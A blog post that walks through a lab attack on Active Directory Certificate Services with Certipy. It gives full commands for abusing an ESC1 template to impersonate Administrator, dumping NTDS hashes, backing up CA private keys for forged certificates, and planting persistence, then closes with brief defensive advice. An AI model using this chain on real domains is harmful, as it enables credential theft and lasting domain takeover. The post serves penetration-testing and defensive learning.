Amit Agarwal Linux Blog

Abusing Active Directory Certificate Services with Certipy: From Initial Access to Beyond Root

2025-12-30 4 min read Active Directory Pentesting Certificate Security

Introduction

When password attacks fail or are noisy, Active Directory Certificate Services (AD CS) often provides a quieter and more elegant road to domain compromise.

Certificates are trusted implicitly. That trust is exactly what makes AD CS such a powerful and frequently overlooked attack surface.

Using the same vulnerable lab and baseline exploitation notes provided earlier :contentReference[oaicite:0]{index=0}, this post focuses on:

  • Enumerating AD CS safely
  • Exploiting misconfigured certificate templates with Certipy
  • Escalating to Domain Admin without cracking passwords
  • Performing post–Domain Admin recon (Beyond Root)

This is the attack path defenders almost never monitor.

Understanding the AD CS Attack Surface

If AD CS is installed, the domain now trusts:

  • Certificate templates
  • Enrollment permissions
  • Subject name controls
  • Authentication EKUs

Any misconfiguration here can bypass password controls entirely.

Before attacking, we enumerate.

Additional Reconnaissance: AD CS Discovery

Detecting Certificate Services

From a compromised domain user context:

1

certipy find -u www@lab.local -p shadow -dc-ip 192.168.198.10

This identifies:

  • Enterprise Certificate Authorities
  • Enabled certificate templates
  • Enrollment permissions
  • Dangerous flags (ESC1–ESC8 conditions)

Key indicators to watch for:

  • ENROLLEE_SUPPLIES_SUBJECT
  • Client Authentication
  • Low-privileged enrollment rights
  • No manager approval required

If you see these together, the domain is already bleeding.

Deep Enumeration with Certipy

Enumerate all vulnerable templates explicitly:

1
2
3
4
5

certipy find \
  -u www@lab.local \
  -p shadow \
  -dc-ip 192.168.198.10 \
  -vulnerable

Example vulnerable template characteristics:

  • Authenticated Users can enroll
  • Client Authentication enabled
  • Subject Alternative Name allowed
  • No approval or signature required

This is a textbook ESC1 scenario.

Exploitation: Requesting a Malicious Certificate

If the template allows subject override, we request a certificate as another user.

Target: Administrator

1
2
3
4
5
6

certipy req \
  -u www@lab.local \
  -p shadow \
  -dc-ip 192.168.198.10 \
  -template VulnerableTemplate \
  -upn Administrator@lab.local

Output:

  • A valid .pfx certificate
  • Issued by the trusted domain CA
  • Fully accepted by Kerberos

No password guessing. No alerts.

Certificate-Based Domain Admin Access

Authenticate using the certificate:

1

certipy auth -pfx administrator.pfx -dc-ip 192.168.198.10

Result:

  • Kerberos TGT for Administrator
  • NT hash retrieved
  • Full Domain Admin identity assumed

At this point, passwords are irrelevant.

Domain Takeover via Certificates

With Domain Admin access established:

1

impacket-secretsdump -k -no-pass lab.local/Administrator@DC01.lab.local

This dumps:

  • NTDS hashes
  • Kerberos keys
  • Service account secrets

This attack path bypasses every password control in the domain.

Additional Enumeration After Compromise

Once Domain Admin is achieved, attackers shift from access to control.

AD CS Persistence

Enumerate CA configuration:

1
2

certutil -getconfig
certutil -catemplates

Attackers may:

  • Backdoor certificate templates
  • Grant hidden enrollment rights
  • Create long-lived persistence certificates

Beyond Root: Post-Domain-Compromise Recon

“Root” is not the end in enterprise environments. It is the beginning.

Trust and Forest Recon

1

nltest /domain_trusts

Look for:

  • One-way trusts
  • External forests
  • Legacy domains

Certificates often work across trusts.

Kerberos Persistence (Golden Certificates)

Dump CA private keys:

1

certutil -backupkey C:\CA_Backup

With CA keys:

  • Certificates can be forged indefinitely
  • Domain rebuilds may still be bypassed
  • Trust is permanently broken

This is worse than Golden Tickets.

Privileged Access Path Mapping

Enumerate dangerous groups:

1
2
3

net group "Enterprise Admins" /domain
net group "Schema Admins" /domain
net group "Key Admins" /domain

These groups control forest-wide security.

Delegation and Lateral Expansion

1

Get-ADComputer -Filter * -Properties TrustedForDelegation

Unconstrained delegation combined with certificate auth enables silent lateral movement.

Why AD CS Attacks Are So Effective

  • Certificates are trusted by design
  • Logging is minimal and fragmented
  • MFA rarely protects certificate auth
  • Many blue teams do not monitor templates

Attackers do not break crypto. They abuse trust.

Defensive Takeaways

  • Audit AD CS templates aggressively
  • Remove subject name override unless absolutely required
  • Restrict enrollment to minimal roles
  • Monitor certificate issuance logs
  • Treat CA private keys as Tier 0 assets
  • Assume certificate persistence is possible after compromise

Conclusion

AD CS turns identity into infrastructure. Infrastructure, once compromised, does not heal easily.

If passwords are doors, certificates are master keys — and too many domains leave them hanging on the wall.

This lab proves a simple truth: If you defend Active Directory but ignore certificates, you are defending half a system.

Active Directory Ad Cs Certipy Certificate Abuse Pentesting Red Team
comments powered by Disqus
© 2018 - 2025 by Amit Agarwal
Bilberry Hugo Theme